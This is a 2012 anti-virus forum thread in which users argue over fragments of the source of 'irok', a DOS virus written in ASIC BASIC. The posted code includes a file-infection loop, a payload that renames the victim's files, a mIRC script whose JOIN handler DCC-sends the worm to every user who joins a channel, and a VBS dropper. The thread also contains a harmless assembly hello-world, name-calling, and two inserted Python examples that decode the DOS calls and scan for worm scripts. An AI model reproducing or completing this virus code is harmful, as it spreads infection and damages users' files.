Let's walk through this virus source code, shall we?

Discussion in 'Anti-Virus' started by RayLopez99, Jul 27, 2012.

  1. RayLopez99

    RayLopez99 Guest

    The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.

    RL

    (My comments in lines having REM in CAPS)


    > Again, the point of my exercise is to expose your ignorance to the
    > world, not mine. Show us what you got. I never said 'fully
    > functional'--I even said pseudocode is oK. Like the other poster
    > said, do you even read your posts?


    write_file:
    rem this routine will write selected bytes at whatever current position
    rem from whatever buffer i choose into the file.
    rem if the routine did not write all data ax will not equal cx upon
    rem return from int call.
    rem define dx register before calling this routine to point to the
    rem memory address of the buffer area you want to write from. like so:
    rem dx=varptr(buffer(0))
    rem cx is how many bytes to write :)

    REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

    if file_handle>4 then
    ax=&hex4000
    bx=file_handle
    cx=bytesize
    int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    byteswritten=ax
    endif
    return

    REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?

    read_file:
    rem as the name implies, it reads bytes into a buffer. :)
    rem as with write_file, you need to predefine the dx register for the
    rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
    rem if you don't, this routine will not work, or will overwrite some
    rem other section of memory. And for virus coding, this is very bad! :)
    rem cx register is how many bytes to read :)

    REM the above comments make no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.


    if file_handle>4 then
    ax=&hex3f00
    bx=file_handle
    cx=bytesize
    int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    bytesread=ax
    endif
    return

    REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?

    actual_virus_replication_start:
    rem The actual code responsible for replication control has
    rem moved down here. It's a new technique of coding that I intend
    rem for my future viruses to use.
    rem used to be called start_virus:
    Rem this is the central virus infection code.
    rem We will search for a maximum of 10 files per run.
    errcode=0
    attr=6
    kewl=0
    virii=7

    REM What are these parameters 'errcode' 'attr' why set to 6? etc

    CALL SUB "FindFirstF" proc$ Attr ErrCode
    REM what is proc$ ? what is this line for?

    WHILE ErrCode = 0
    CALL SUB "GetNameF" FileName$
    filename$=virupath$+filename$
    if sleepy=0 then
    gosub infect_check:
    if infected=0 then
    gosub lets_infect:
    endif
    else
    errcode=1
    endif
    CALL SUB "FindNextF" ErrCode
    if kewl=virii then
    errcode=1
    endif
    WEND

    REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'

    return

    rem ***BEGIN PAYLOAD(S) CODE
    payload:
    clear_to_run=1
    if hre$>"20" then

    REM what is the above line doing?

    rem Executables remain offline for the remainder of the evening.
    clear_to_run=0
    endif


    if min$="17" then


    rem We're fixing to hose this dudes drive. Well, not really.

    REM typical stupid self-aggrandizing comment. Imagine--this guy is writing this for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers


    rem We're renaming all files/directorys from current\root to
    rem high ascii characters. The user doesn't actually lose anything,
    rem he just (average user) doesn't know what to do at this point. ;p
    rem this takes a second or two, so We're going to display some
    rem text to keep the user busy.
    cls
    print"Some say the end is near. Some say we'll see Armageddon"
    print"soon. I certainly hope we will. The only way to fix it is"
    print"to flush it all away. Any ****ing joint, any ****in Day."
    print""
    print"**** all these gun toting hip gangster wannabes. **** your"
    print"tattoes, **** all you junkies and your short memory. I'm"
    print"praying for rain, I'm prayin for tidal waves. I wanna see"
    print"the ground give way. I wanna watch it all go down. Mah"
    print"please flush it all away, I wanna see it go riding down. I"
    print"wanna see it go riding. Watch you flush it all away."
    print""
    print"Where do bad folks go when they die? They don't goto heaven"
    print"where the angels fly. They goto a lake of fire and fry. See"
    print"em again till the 4th of July. People cry and people moan."
    print"look for a dry place to call their own, look for a dry place"
    print"to rest there bones."
    print""
    gosub whack_a_system:
    print"Thanks for reading the text above, I've had enough time to"
    print"remove the contents of your hard disk for you. :)"
    gosub keypress:

    if min$="21" then
    print"ž IRoK v1.1 - RaiD/SLAM[2000]"
    gosub keypress:
    call sub "Stars"
    return
    endif

    REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?



    rem End of payload jumpsystem!

    mirc_drop:
    filename$=drive$
    filename$=filename$+"mirc\irok.exe"
    script$=drive$
    script$=script$+"mirc\script.ini"
    gosub raidyworm:
    rem Worm copy dumped
    rem raidyworm returns filename$ that you sent.


    REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.

    tempfile$=filename$
    filename$=script$
    gosub set_attr:
    filename$=tempfile$
    rem drop script
    open"o",2,script$
    sensitivemsg=1
    msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
    gosub dump_msg:
    msg$="n2= /dcc send $nick "
    msg$=msg$+filename$
    msg$=msg$+"|"
    gosub dump_msg:
    msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK v1.1|"
    gosub dump_msg:
    close 2
    return

    vbsdrop:
    rem we have to drop a piece of VBS material. We have an external routine
    rem which handles this. We need only create the worm file, and then
    rem call the routine. However, before we do this, We check to see if we've
    rem done this before. If so, we don't ever do it again. Well, unless the
    rem user deletes our marker.
    vbsdrop=0
    open"i",2,"c:\windows\system\winrde.dll"
    if error>0 then
    rem we haven't done this, ok kewl.
    vbsdrop=1
    endif
    close 2
    if vbsdrop=1 then
    tempname$=filename$
    filename$="c:\windows\system\irok.exe"
    gosub raidyworm:
    rem Ok, worms dropped.
    filename$=tempname$
    call sub "vbsroutine"
    rem Now create marker.
    open"o",2,"c:\windows\system\winrde.dll"
    for x=1 to 8095
    print #2,x
    next x
    close 2
    endif
    return

    whack_a_system:
    rem Simple routine. One line. ;p
    call sub "drago"
    return

    raidyworm:
    rem worm dump
    rem specify filename to dump too in filename$
    newattr=0
    gosub set_attr:
    gosub create_file:
    tempsize=virus_size
    tempsize=tempsize+1
    bytesize=tempsize
    dx=varptr(virus_data(0))
    gosub write_file:
    gosub close_file:
    rem One worm to order.
    return

    rem ***--> End of Payload section.

    > Commented enough for you Ray?


    > That's not pseudo code either. That's verbatim irok source code.


    It's missing stuff. See the above and comment.

    > if she even knows you. And non-programmers like the kiddie scripters
    > you so despise. Dream on. You are nothing.


    RL

    PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.
     
    RayLopez99, Jul 27, 2012
    #1
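    Ray's questions about `&hex4000`, `&hex3f00` and the `file_handle>4` guard are answered by the documented MS-DOS INT 21h interface rather than by anything in the virus itself. The Python below is an added example, not code from the thread or from the irok source: it walks the two quoted routines, tracks the register variables the code assigns, and names the DOS service each `int86(&hex21, ...)` call selects. `decode_routines`, `handle_kind` and the tables are names of this example; the routine text is copied from the post above.

```python
"""Name the MS-DOS INT 21h services behind the quoted write_file/read_file.

Added example, not code from the thread or from the irok source.  It parses
the ASIC-style lines copied from the post, tracks the register variables the
code assigns (ax, bx, cx, dx, ...) and, at each int86(&hex21, ...) call,
reports which DOS service the AH byte selects.  Function numbers and the
standard-handle table are the documented MS-DOS programming interface.
"""
import re

# INT 21h services selected by AH that appear in the quoted routines.
DOS_SERVICES = {
    0x3F: "read from handle (BX=handle, CX=byte count, DS:DX=buffer)",
    0x40: "write to handle (BX=handle, CX=byte count, DS:DX=buffer)",
    0x09: "write '$'-terminated string to standard output (DS:DX=string)",
    0x4C: "terminate process with return code AL",
}

# DOS opens handles 0-4 for every process before it starts; any handle above
# 4 was opened by the program itself, which is what `file_handle>4` tests.
STANDARD_HANDLES = {0: "STDIN", 1: "STDOUT", 2: "STDERR", 3: "STDAUX", 4: "STDPRN"}

# Routine text copied from the post (comments and Ray's REM notes removed).
ROUTINES = """
write_file:
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

read_file:
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
"""

_HEX = re.compile(r"&hex([0-9a-f]+)", re.IGNORECASE)  # ASIC hex literal: &hex4000
_ASSIGN = re.compile(r"(\w+)\s*=\s*([^()]+)")         # simple `var=value` lines
_LABEL = re.compile(r"(\w+):")                         # routine label: write_file:


def parse_value(token, env):
    """Resolve a right-hand side: &hex literal, decimal, or a known variable."""
    token = token.strip()
    if m := _HEX.fullmatch(token):
        return int(m.group(1), 16)
    if token.isdigit():
        return int(token)
    return env.get(token.lower())  # variables the snippet never sets stay None


def decode_routines(source):
    """Return [(label, ah, al, description)] for every int86(&hex21, ...) call."""
    env, label, calls = {}, None, []
    for raw in source.splitlines():
        line = raw.strip()
        if not line or re.match(r"rem\b", line, re.IGNORECASE):
            continue                                   # blank or comment
        if m := _LABEL.fullmatch(line):
            label = m.group(1)                         # entering a new routine
        elif m := _ASSIGN.fullmatch(line):
            env[m.group(1).lower()] = parse_value(m.group(2), env)
        elif line.lower().startswith("int86("):
            args = line[len("int86("):].rstrip(")").split(",")
            if parse_value(args[0], env) == 0x21 and env.get("ax") is not None:
                ah, al = env["ax"] >> 8, env["ax"] & 0xFF
                calls.append((label, ah, al, DOS_SERVICES.get(ah, "unknown service")))
    return calls


def handle_kind(handle):
    """Classify a DOS handle the way the quoted `file_handle>4` guard does."""
    if handle in STANDARD_HANDLES:
        return "standard device " + STANDARD_HANDLES[handle]
    return "handle opened by the program"


if __name__ == "__main__":
    for label, ah, al, desc in decode_routines(ROUTINES):
        print(f"{label}: INT 21h AH={ah:02X}h AL={al:02X}h -> {desc}")
    for h in (1, 5):
        print(f"handle {h}: {handle_kind(h)}")
```

    The remaining `na` arguments to `int86` are left unexamined here; only the interrupt number and the AX value decide which DOS service runs.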

  2. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL
    >
    > (My comments in lines having REM in CAPS)
    >
    >
    >> Again, the point of my exercise is to expose your ignorance to the
    >> world, not mine. Show us what you got. I never said 'fully
    >> functional'--I even said pseudocode is oK. Like the other poster
    >> said, do you even read your posts?

    >
    > write_file:
    > rem this routine will write selected bytes at whatever current
    > position rem from whatever buffer i choose into the file.
    > rem if the routine did not write all data ax will not equal cx upon
    > rem return from int call.
    > rem define dx register before calling this routine to point to the
    > rem memory address of the buffer area you want to write from. like
    > so: rem dx=varptr(buffer(0))
    > rem cx is how many bytes to write :)
    >
    > REM AX, DX, CX are Intel Registers--how many such registers in the
    > x86?--RL


    I see you can use google. You've demonstrated google ability here, not
    that you understand what I'm doing.

    > if file_handle>4 then
    > ax=&hex4000
    > bx=file_handle
    > cx=bytesize
    > int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    > byteswritten=ax
    > endif
    > return
    >
    > REM - what do the lines above do? Perhaps file_handle > 4 goes to
    > long file names? what address is "&hex4000"? why set bx,cx to these
    > values, and what about na? Is this a 'null' or 'zero' for remaining
    > registers?


    As I said, you googled for the information you provided above. You could
    google for this too. Long filenames? Via file handle? Er, no. :)

    > read_file:
    > rem as the name implies, it reads bytes into a buffer. :)
    > rem as with write_file, you need to predefine the dx register for the
    > rem buffer where you want the info stored. Like so:
    > dx=varptr(buffer(0)) rem if you don't, this routine will not work, or
    > will overwrite some rem other section of memory. And for virus
    > coding, this is very bad! :) rem cx register is how many bytes to
    > read :)
    >
    > REM the above comments makes no sense, not to mention the stupid
    > smileys are annoying. But I don't see where the dx register was set
    > to zero as he claims.


    it's not set to zero. buffer(0) is a reference point. it's an array,
    Ray! :) First element.

    >
    > if file_handle>4 then
    > ax=&hex3f00
    > bx=file_handle
    > cx=bytesize
    > int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    > bytesread=ax
    > endif
    > return
    >
    > REM same as before, why? Why is file_handle not < 4? why this
    > cutoff? Perhaps very long file names are not supported by this
    > program?


    Some programmer you are...

    > REM What are these parameters 'errcode' 'attr' why set to 6? etc


    I didn't think you'd be able to follow along... Even with commented
    code, in asic of all things.. Cripes.

    > CALL SUB "FindFirstF" proc$ Attr ErrCode
    > REM what is proc$ ? what is this line for?


    Damnit Ray. What good would it do me to post pure asm, or pseudo code as
    you said? You can't even follow asic!

    > WHILE ErrCode = 0
    > CALL SUB "GetNameF" FileName$
    > filename$=virupath$+filename$
    > if sleepy=0 then
    > gosub infect_check:
    > if infected=0 then
    > gosub lets_infect:
    > endif
    > else
    > errcode=1
    > endif
    > CALL SUB "FindNextF" ErrCode
    > if kewl=virii then
    > errcode=1
    > endif
    > WEND
    >
    > REM seems I understand what is going on at a conceptual level but
    > without the SUB functions not 100% clear. Need the gosub
    > 'lets_infect'


    No you don't. Really, you don't need that. Between the two source
    snippets posted since yesterday, had you really been a programmer, you'd
    already know what it's doing, AND how.


    > return
    >
    > rem ***BEGIN PAYLOAD(S) CODE
    > payload:
    > clear_to_run=1
    > if hre$>"20" then
    >
    > REM what is the above line doing?


    It's checking a variable in military time. If it's after 8pm, your
    original program will not run. Just irok. It's put your infected
    applications to sleep; and this is how it checks the time.

    > rem Executables remain offline for the remainder of the evening.
    > clear_to_run=0
    > endif
    >
    >
    > if min$="17" then
    >
    >
    > rem We're fixing to hose this dudes drive. Well, not really.
    >
    > REM typical stupid self-aggrandizing comment. Imagine--this guy is
    > writing this for a future audience. Ironically, now that he has an
    > audience (if in fact our Dustin is the real author) he will not or
    > cannot explain his code. Wow, that speaks volumes. Either
    > incompetence / fakery, excessive misplaced paranoia about the law and
    > how it operates (and he's already in deep water, for reasons he does
    > not even understand), or just playing drama games for his clueless
    > kiddie script non-programmer followers


    I shouldn't have to explain this code. It's very simple. It wasn't
    intended for an audience Ray. You're looking at 12 year old source code.

    > REM what is the above? Perhaps to display something in stdout, the
    > console? Is this a console mode MS-DOS virus?


    Didn't you read its long description at the url posted? It's a DOS
    based virus, Yes. You can't pipe it to stdout; I used asic's internal
    print routines instead of my faster asm ones which supported piping.

    It'll display in console, and only in console.

    >
    >
    > rem End of payload jumpsystem!
    >
    > mirc_drop:
    > filename$=drive$
    > filename$=filename$+"mirc\irok.exe"
    > script$=drive$
    > script$=script$+"mirc\script.ini"
    > gosub raidyworm:
    > rem Worm copy dumped
    > rem raidyworm returns filename$ that you sent.
    >
    >
    > REM need subs--that's where the action is...Dustin did not provide.
    > Scared again it seems.


    The action is in the subroutines. Yes, everything else sets it up for
    subroutines. Any decent coder will not rehash the same code, he'll use
    routines multiple times instead.

    Not scared of anything, just not going to help you write a virus to
    cause mischief. Besides, I remember your question about routing and how
    you dissed me after I provided the information you requested.

    You don't really need the missing subroutines if you were half the
    programmer, or sorry, coder you said you were. The code I've posted is
    enough to get the idea and concept.

    > It's missing stuff. See the above and comment.


    I told you from the getgo it would be. I won't provide you complete
    source to irok, and you can't find it online either. I never released
    it. [g]

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    Okay. Assembler you want, assembler you get.
    Assemble using nasm. Tasm should work, but it was written in and for
    nasm.

    This is my hello world in nasm...

    assemble it, and run.

    segment code

    start:
    mov ax,data          ; DS starts out pointing at the PSP; point it at our data
    mov ds,ax
    mov ax,stack         ; SS:SP -> top of our own 64-byte stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello         ; DS:DX -> '$'-terminated string
    mov ah,9             ; DOS INT 21h, AH=09h: write string to standard output
    int 0x21

    mov ax,0x4c00        ; AH=4Ch terminate process, AL=00h return code
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'   ; CR, LF, then DOS's '$' terminator

    segment stack stack
    resb 64              ; reserve the 64-byte stack area
    stacktop:



    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #2
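    The mirc_drop routine quoted in this thread writes a script.ini whose JOIN handler DCC-sends the worm to everyone who enters a channel, and whose TEXT handler broadcasts on a trigger word; that is the pattern AV and host scanners looked for in mIRC worms. The Python below is an added example, not code from the thread or from the irok source: `audit_script_ini` parses the `[script]` section, groups `nN=` entries into event handlers by brace depth, and flags those handlers. The sample script.ini content is constructed from the strings the routine writes; the function names and keyword table are this example's own.

```python
"""Flag worm-style event handlers in a mIRC script.ini.

Added example, not code from the thread or from the irok source.  The
mirc_drop routine quoted in the thread writes a [script] section whose JOIN
handler DCC-sends a file to every user who joins a channel and whose TEXT
handler broadcasts on a trigger word; this is the check an AV or host
scanner would run over script.ini to flag such handlers.  The sample
script.ini below is constructed from the strings the routine writes.
"""
import re

# Constructed: the nN= lines mirc_drop dumps ('|' separators expanded, dropped
# worm path filled in as the routine does).  Not captured from a real host.
SAMPLE_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{
n1=if ($nick != $me) {
n2= /dcc send $nick C:\\mirc\\irok.exe
n3= }
n4=}
n5=on 1:TEXT:irok:#:/amsg My computer is 0wned by IRoK v1.1
"""

# Constructed benign handler: greets only the local user, sends nothing.
BENIGN_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{
n1=  if ($nick == $me) { echo -a joined $chan }
n2=}
"""

# mIRC event line: on <level>:<EVENT>:<args>  (level may be 1, *, or a name)
EVENT_RE = re.compile(r"on\s+[^:]+:(\w+):", re.IGNORECASE)

# Event type -> (substring in handler body, why it is suspicious)
SUSPICIOUS = {
    "JOIN": [("dcc send", "DCC-sends a file to users as they join (self-spreading)")],
    "TEXT": [("amsg", "trigger word causes a broadcast to every joined channel")],
}


def script_entries(text):
    """Yield (index, code) for the nN= entries of the [script] section, in order."""
    in_script = False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        m = re.fullmatch(r"n(\d+)=(.*)", line)
        if in_script and m:
            yield int(m.group(1)), m.group(2)


def event_blocks(entries):
    """Group entries into (event, first_index, body) using { } nesting depth."""
    blocks, current, depth = [], None, 0
    for idx, code in entries:
        m = EVENT_RE.match(code.strip())
        if m and depth == 0:                 # a new handler starts at depth 0
            current = (m.group(1).upper(), idx, [])
            blocks.append(current)
        if current is not None:
            current[2].append(code)
        depth = max(0, depth + code.count("{") - code.count("}"))
    return [(name, idx, "\n".join(body)) for name, idx, body in blocks]


def audit_script_ini(text):
    """Return [(event, entry_index, reason)] for every handler matching SUSPICIOUS."""
    findings = []
    for name, idx, body in event_blocks(script_entries(text)):
        low = body.lower()
        for needle, reason in SUSPICIOUS.get(name, []):
            if needle in low:
                findings.append((name, idx, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_script_ini(SAMPLE_SCRIPT_INI):
        print("suspicious:", finding)
    print("benign findings:", audit_script_ini(BENIGN_SCRIPT_INI))
```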

  3. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DC95497914HHI2948AJD832@no:

    > Okay. Assembler you want, assembler you get.
    > Assemble using nasm. Tasm should work, but it was written in and for
    > nasm.


    Written in=qedit, saved as ascii text and fed to nasm via cli. [g] Just
    in case Ant wants to be anal with me on this. [eg]

    > This is my hello world in nasm...
    >
    > assemble it, and run.
    >
    > segment code
    >
    > start:
    > mov ax,data
    > mov ds,ax
    > mov ax,stack
    > mov ss,ax
    > mov sp,stacktop
    >
    > mov dx,hello
    > mov ah,9
    > int 0x21
    >
    > mov ax,0x4c00
    > int 0x21
    >
    > segment data
    >
    > hello: db 'hello, ****ing, world',13,10,'$'
    >
    > segment stack stack
    > resb 64
    > stacktop:


    Nothing special, not commented as well, it shouldn't need to be Ray! :)

    Oh, and just so you know, this is assembler basics 101; it can be found
    online in many different styles. There's several ways to write this to do
    the same thing. My code could even be made smaller by removing a few
    things you don't actually need.

    You can't get any lower bytewise than assembler or outright machine
    language. Not even C can make a binary smaller. [g]


     
    Dustin, Jul 28, 2012
    #3
  4. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    segment code

    start:
    mov ax,data
    mov ds,ax
    mov ax,stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello
    mov ah,9
    int 0x21

    mov ax,0x4c00
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'

    segment stack stack
    resb 64
    stacktop:


    Lemme know if you need it explained line by line too. [g]
    you can find nasm online for free.

    Now then...

    Unless you can eat some crow like a good man, and show some respect; I'm
    about done explaining old ass technology and ways of doing things. Your
    challenges are boring the **** out of me, too. You've stated you have a
    book on viruses.. Have you opened the damn thing?






     
    Dustin, Jul 28, 2012
    #4
  5. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DCAB6F6864HHI2948AJD832@no:

    > segment code
    >
    > start:
    > mov ax,data
    > mov ds,ax
    > mov ax,stack
    > mov ss,ax
    > mov sp,stacktop
    >
    > mov dx,hello
    > mov ah,9
    > int 0x21
    >
    > mov ax,0x4c00
    > int 0x21
    >
    > segment data
    >
    > hello: db 'hello, ****ing, world',13,10,'$'
    >
    > segment stack stack
    > resb 64
    > stacktop:


    Which turns into :

    Volume in drive C has no label.
    Volume Serial Number is B051-3A91

    Directory of C:\Program Files\nasm

    03/15/1997 09:21 PM 259 hello.asm
    03/15/1997 02:15 PM 561 HELLO.EXE
    03/15/1997 02:15 PM 196 hello.obj
    3 File(s) 1,016 bytes
    0 Dir(s) 27,684,458,496 bytes free

    Hmm. I'm running low on drive space...

    See how old that code is too Ray? [g] Older than irok. hehehe.

    Punkass.


     
    Dustin, Jul 28, 2012
    #5
  6. RayLopez99

    G. Morgan Guest

    Dustin wrote:

    >segment code
    >
    >start:
    >mov ax,data
    >mov ds,ax
    >mov ax,stack
    >mov ss,ax
    >mov sp,stacktop
    >
    >mov dx,hello
    >mov ah,9
    >int 0x21
    >
    >mov ax,0x4c00
    >int 0x21
    >
    >segment data
    >
    >hello: db 'hello, ****ing, world',13,10,'$'
    >
    >segment stack stack
    >resb 64
    >stacktop:
    >
    >
    >Lemme know if you need it explained line by line too. [g]
    >you can find nasm online for free.


    How do I manually assemble it with 'debug'?
     
    G. Morgan, Jul 28, 2012
    #6
  7. RayLopez99

    Dustin Guest

    G. Morgan <> wrote in
    news::

    > Dustin wrote:
    >
    >>segment code
    >>
    >>start:
    >>mov ax,data
    >>mov ds,ax
    >>mov ax,stack
    >>mov ss,ax
    >>mov sp,stacktop
    >>
    >>mov dx,hello
    >>mov ah,9
    >>int 0x21
    >>
    >>mov ax,0x4c00
    >>int 0x21
    >>
    >>segment data
    >>
    >>hello: db 'hello, ****ing, world',13,10,'$'
    >>
    >>segment stack stack
    >>resb 64
    >>stacktop:
    >>
    >>
    >>Lemme know if you need it explained line by line too. [g]
    >>you can find nasm online for free.

    >
    > How do I manually assemble it with 'debug'?
    >
    >


    sigh

    convert my 0x to 21h and type each line one at a time...
    would just be easier if you assembled it with nasm...
    debug is a pain in the ass.



     
    Dustin, Jul 28, 2012
    #7
  8. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DDA353D740HHI2948AJD832@no:

    > G. Morgan <> wrote in
    > news::
    >
    >> Dustin wrote:
    >>
    >>>segment code
    >>>
    >>>start:
    >>>mov ax,data
    >>>mov ds,ax
    >>>mov ax,stack
    >>>mov ss,ax
    >>>mov sp,stacktop
    >>>
    >>>mov dx,hello
    >>>mov ah,9
    >>>int 0x21
    >>>
    >>>mov ax,0x4c00
    >>>int 0x21
    >>>
    >>>segment data
    >>>
    >>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>
    >>>segment stack stack
    >>>resb 64
    >>>stacktop:
    >>>
    >>>
    >>>Lemme know if you need it explained line by line too. [g]
    >>>you can find nasm online for free.

    >>
    >> How do I manually assemble it with 'debug'?
    >>
    >>

    >
    > sigh
    >
    > convert my 0x to 21h and type each line one at a time...
    > would just be easier if you assembled it with nasm...
    > debug is a pain in the ass.
    >
    >
    >


    I'm assuming you know how to enter assemble mode here with debug,
    morgan. If you're being cheeky with me, I won't offer any more help :)


     
    Dustin, Jul 28, 2012
    #8
  9. RayLopez99

    Buffalo Guest

    "RayLopez99" <> wrote in message
    news:...
    The poster that goes by "Dustin" in this group posted the below. Don't know
    where he got it, probably cut and paste from somewhere, but I'd thought it
    could be a good exercise to go through it, line by line, and figure out what
    it does. I would appreciate any comments, and I would cross-post this but
    Google Groups no longer supports that feature.

    RL
    Teenage jerk-off!!
    Buffalo
     
    Buffalo, Jul 28, 2012
    #9
  10. RayLopez99

    Dustin Guest

    "Buffalo" <> wrote in
    news:juvfq2$hta$:

    > "RayLopez99" <> wrote in message
    > news:...
    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL
    > Teenage jerk-off!!
    > Buffalo
    >
    >
    >


    hehehe.. I'm starting to wonder about Ray's age myself.. No experience with
    older languages, inability to understand a very simple language...

    and he keeps telling me I'm in my 60s. :)


     
    Dustin, Jul 28, 2012
    #10
  11. RayLopez99

    G. Morgan Guest

    Dustin wrote:

    >Dustin <> wrote in
    >news:XnsA09DDA353D740HHI2948AJD832@no:
    >
    >> G. Morgan <> wrote in
    >> news::
    >>
    >>> Dustin wrote:
    >>>
    >>>>segment code
    >>>>
    >>>>start:
    >>>>mov ax,data
    >>>>mov ds,ax
    >>>>mov ax,stack
    >>>>mov ss,ax
    >>>>mov sp,stacktop
    >>>>
    >>>>mov dx,hello
    >>>>mov ah,9
    >>>>int 0x21
    >>>>
    >>>>mov ax,0x4c00
    >>>>int 0x21
    >>>>
    >>>>segment data
    >>>>
    >>>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>>
    >>>>segment stack stack
    >>>>resb 64
    >>>>stacktop:
    >>>>
    >>>>
    >>>>Lemme know if you need it explained line by line too. [g]
    >>>>you can find nasm online for free.
    >>>
    >>> How do I manually assemble it with 'debug'?
    >>>
    >>>

    >>
    >> sigh
    >>
    >> convert my 0x to 21h and type each line one at a time...
    >> would just be easier if you assembled it with nasm...
    >> debug is a pain in the ass.
    >>
    >>
    >>

    >
    >I'm assuming you know how to enter assemble mode here with debug,
    >morgan. If you're being cheeky with me, I won't offer any more help :)



    No, I'm serious. I opened a debug shell and tried to type (paste
    actually) the lines in. I got all errors. Then I did one at a time,
    typed, error each time. Then I tried the "assemble" command pointed to
    a file, didn't work. It's been a long time since I've done anything in
    'debug', forgot it all! I didn't look it up at the time (still haven't)
    because I was watching the Olympics opening.

    No biggie. You don't have to help - I took a chance even asking.
     
    G. Morgan, Jul 28, 2012
    #11
  12. RayLopez99

    Hot-Text Guest

    "G. Morgan" <> wrote in message news:...
    > Dustin wrote:
    >
    >>Dustin <> wrote in
    >>news:XnsA09DDA353D740HHI2948AJD832@no:
    >>
    >>> G. Morgan <> wrote in
    >>> news::
    >>>
    >>>> Dustin wrote:
    >>>>
    >>>>>segment code
    >>>>>
    >>>>>start:
    >>>>>mov ax,data
    >>>>>mov ds,ax
    >>>>>mov ax,stack
    >>>>>mov ss,ax
    >>>>>mov sp,stacktop
    >>>>>
    >>>>>mov dx,hello
    >>>>>mov ah,9
    >>>>>int 0x21
    >>>>>
    >>>>>mov ax,0x4c00
    >>>>>int 0x21
    >>>>>
    >>>>>segment data
    >>>>>
    >>>>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>>>
    >>>>>segment stack stack
    >>>>>resb 64
    >>>>>stacktop:
    >>>>>
    >>>>>
    >>>>>Lemme know if you need it explained line by line too. [g]
    >>>>>you can find nasm online for free.
    >>>>
    >>>> How do I manually assemble it with 'debug'?
    >>>>
    >>>>
    >>>
    >>> sigh
    >>>
    >>> convert my 0x to 21h and type each line one at a time...
    >>> would just be easier if you assembled it with nasm...
    >>> debug is a pain in the ass.
    >>>
    >>>
    >>>

    >>
    >>I'm assuming you know how to enter assemble mode here with debug,
    >>morgan. If you're being cheeky with me, I won't offer any more help :)

    >
    >
    > No, I'm serious. I opened a debug shell and tried to type (paste
    > actually) the lines in. I got all errors. Then I did one at a time,
    > typed, error each time. Then I tried the "assemble" command pointed to
    > a file, didn't work. It's been a long time since I've done anything in
    > 'debug', forgot it all! I didn't look it up at the time (still haven't)
    > because I was watching the Olympics opening.
    >
    > No biggie. You don't have to help - I took a chance even asking.
    >

    03h CPU: The lowest non-reserved interrupt,
    it is used exclusively for debugging,
    and the INT 03 handler is always implemented by a debugging program
     
    Hot-Text, Jul 28, 2012
    #12
  13. RayLopez99

